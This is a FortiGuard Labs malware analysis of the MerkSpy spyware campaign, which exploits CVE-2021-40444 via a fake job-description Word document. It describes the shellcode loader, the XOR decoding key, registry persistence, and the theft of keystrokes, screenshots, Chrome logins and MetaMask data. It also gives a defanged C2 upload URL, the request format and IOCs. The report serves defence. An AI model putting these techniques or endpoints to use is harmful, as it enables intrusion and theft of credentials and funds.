MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs

Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High

Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.

FortiGuard Labs recently detected an attack exploiting the CVE-2021-40444 vulnerability in Microsoft Office. This flaw allows attackers to execute malicious code via specially crafted documents. In this instance, the exploitation led to the deployment of a spyware payload known as “MerkSpy.” MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems.

This blog will dissect the stages of this complex attack, offering insights into the techniques used by cybercriminals to infiltrate systems and steal sensitive data.

Attack flow diagram of MerkSpy. It exploits CVE-2021-40444, downloads the file olerender.html, writes shell code, downloads GoogleUpdate, decodes data to get injector, injects MerkSpy, and then uploads stolen data to the address 45.89.53.46


Figure 1: Attack flow

CVE-2021-40444 Exploitation

The initial vector for this attack is a deceptive Microsoft Word document posing as a job description for a software developer position.

A screenshot of the Word document. It contains a job description for a software developer position.


Figure 2: Word document

Opening the document triggers the exploitation of CVE-2021-40444, a remote code execution vulnerability within the MSHTML component used by Internet Explorer in Microsoft Office. This vulnerability permits an attacker to execute arbitrary code on a victim’s machine without additional user interaction beyond opening the document. The attacker conceals the URL within the “_relsdocument.xml” file. It directs to hxxp://45[.]89[.]53[.]46/google/olerender[.]html, downloading an HTML file that sets the stage for the next phase of the attack.

The _relsdocument.xml document. The part that downloads an HTML file is highlighted


Figure 3: _relsdocument.xml

ShellCode Preparation

After the successful exploitation, the malicious document initiates the downloaded payload, “olerender.html,” from a remote server. This HTML file is strategically crafted, with innocuous script filling the beginning to mask its true intent. The end of the file conceals the shellcode and injection process, which propels the attack forward when executed on the victim’s machine.

The olerender.html file. The beginning of the file contains innocuous script and documentation


Figure 4: olerender.html

The code at the end of the olerender.html file with the shellcode and injection process


Figure 5: Code at the end of olerender.html

“olerender.html” first checks the system’s OS version. If it detects an X64 architecture, it extracts the embedded “sc_x64” shellcode.

OS checking in olerender.html


Figure 6: OS checking

After determining the OS version and extracting the appropriate shellcode, “olerender.html” locates and retrieves the Windows APIs “VirtualProtect” and “CreateThread.” These functions are crucial for the following steps: it leverages “VirtualProtect” to modify memory permissions, allowing the decoded shellcode to be written into memory securely. Following this, “CreateThread” executes the injected shellcode, setting the stage for downloading and executing the next payload from the attacker’s server. This process ensures that the malicious code runs seamlessly, facilitating further exploitation.

olerender.html locates and retrieves the Windows APIs VirtualProject and CreateThread


Figure 7: Retrieving the Windows APIs

Decoding the shellcode via XOR


Figure 8: Decoding the shellcode via XOR

Writing and invoking the shellcode


Figure 9: Writing and invoking the shellcode

ShellCode

Once the shellcode is in place, it functions as a downloader, initiating the next phase of the attack. It reaches out to the same remote server to fetch a file, deceptively named “GoogleUpdate.” Despite its seemingly innocuous name, “GoogleUpdate” is far from benign. This file harbors the core malicious payload, which is deeply encoded to evade detection by standard security measures. Upon successful download, the shellcode meticulously decodes and prepares this payload for execution. 

Downloaded "GoogleUpdate"


Figure 10: Downloaded “GoogleUpdate”

Once “GoogleUpdate” is downloaded, the shellcode decodes the file using an XOR key of 0x25021420 and an increment value of 0x00890518. This decryption process is crucial as it extracts the concealed actual payload embedded within the file. By employing these specific cryptographic techniques, the shellcode ensures that the malicious content remains hidden, allowing the attacker to execute their intended operations on the compromised system effectively.

XOR-decoded GoogleUpdate file


Figure 11: XOR-decoded file and its payload injection

MerkSpy

The extracted payload is protected with VMProtect. Its primary function is seamlessly injecting the MerkSpy spyware into crucial system processes. MerkSpy spyware operates covertly within a system, enabling it to capture sensitive information, monitor user activities, and exfiltrate data to remote servers controlled by malicious actors. 

The Detect It Easy tool showing a file protected by VMProtect


Figure 12: A file’s information shown using the DIE (Detect It Easy) tool

MerkSpy achieves persistence by masquerading as “Google Update,” adding a registry entry for “GoogleUpdate.exe” in “SoftwareMicrosoftWindowsCurrentVersionRun.” This deceptive tactic ensures that MerkSpy launches automatically at system startup, enabling continuous operation and data exfiltration without the user’s knowledge or consent.

Diagram illustrating how Merkspy creates a registry entry


Figure 13: Creating a registry entry

Following its installation, MerkSpy initiates the exfiltration process and begins monitoring specific targets: capturing screenshots, logging keystrokes, retrieving Chrome login credentials, and accessing the MetaMask extension. Once it gathers this data, MerkSpy uploads the collected information to the attacker’s server through the URL hxxp://45[.]89[.]53[.]46/google/update[.]php.

Switch cases of monitoring a compromised endpoint


Figure 14: Switch cases of monitoring a compromised endpoint

The POST request employs a user agent string of “WINDOWS” and uses a fixed boundary, “—————————update request,” indicating it is a multi-part form-data submission. The request body is comprised of multiple parts:

  • “id”—Specifies the client ID, which includes the computer’s hostname and the user’s name.
  • “check”—A status flag indicating the check-in.

Part of the request body with a status flag indicating the check-in.

  • “key”—Contains the data captured by the keystroke logger. When uploading a large file, this parameter serves as an index for the uploading file.

Part of the request body with the key that contains the data captured by the keystroke logger

  • “fileToUpload[]” – Represents an uploaded file, such as extracted login credentials or a screenshot.

Part of the request body with fileToUpload[], which represents an uploaded file

Part of the request body with fileToUpload[], which represents an uploaded file

Based on telemetry from the C2 server at “45[.]89[.]53[.]46,” a significant activity spike began at the end of May, primarily targeting North America and India.

World map showing the telemetry from the C2 server. The activity primarily focuses on North America and India.


Figure 15: Telemetry

Conclusion

The initial phase of the attack leverages a vulnerability in the MSHTML component used by Internet Explorer. Upon exploitation, it initiates the download of a file named “olerender.html,” which contains JavaScript and embedded shellcode. This shellcode decodes the downloaded content to execute an injector responsible for loading the MerkSpy spyware into memory and integrating it with active system processes. MerkSpy is capable of sophisticated surveillance activities, including keystroke logging, screenshot capture, and harvesting Chrome browser login data. By understanding the intricacies of this attack chain, organizations can enhance their readiness and deploy effective defenses against such intrusions. FortiGuard Labs remains vigilant in monitoring these threats and offers ongoing intelligence to safeguard our users.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

MSOffice/Agent.AN!tr

HTML/Agent.SC!tr

Data/Agent.C1FT!tr

W64/Injector.SRQ!tr

FortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.

The FortiGuard CDR (content disarm and reconstruction) service, which runs on both FortiGate and FortiMail, can disarm the malicious macros in the document.

We also suggest that organizations go through Fortinet’s free NSE training module: NSE 1 – Information Security Awareness. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs

IP Addresses

45[.]89[.]53[.]46

Files

92eb60179d1cf265a9e2094c9a54e025597101b8a78e2a57c19e4681df465e08

95a3380f322f352cf7370c5af47f20b26238d96c3ad57b6bc972776cc294389a

0ffadb53f9624950dea0e07fcffcc31404299230735746ca43d4db05e4d708c6

dd369262074466ce937b52c0acd75abad112e395f353072ae11e3e888ac132a8

569f6cd88806d9db9e92a579dea7a9241352d900f53ff7fe241b0006ba3f0e22

6cdc2355cf07a240e78459dd4dd32e26210e22bf5e4a15ea08a984a5d9241067 

Source: Original Post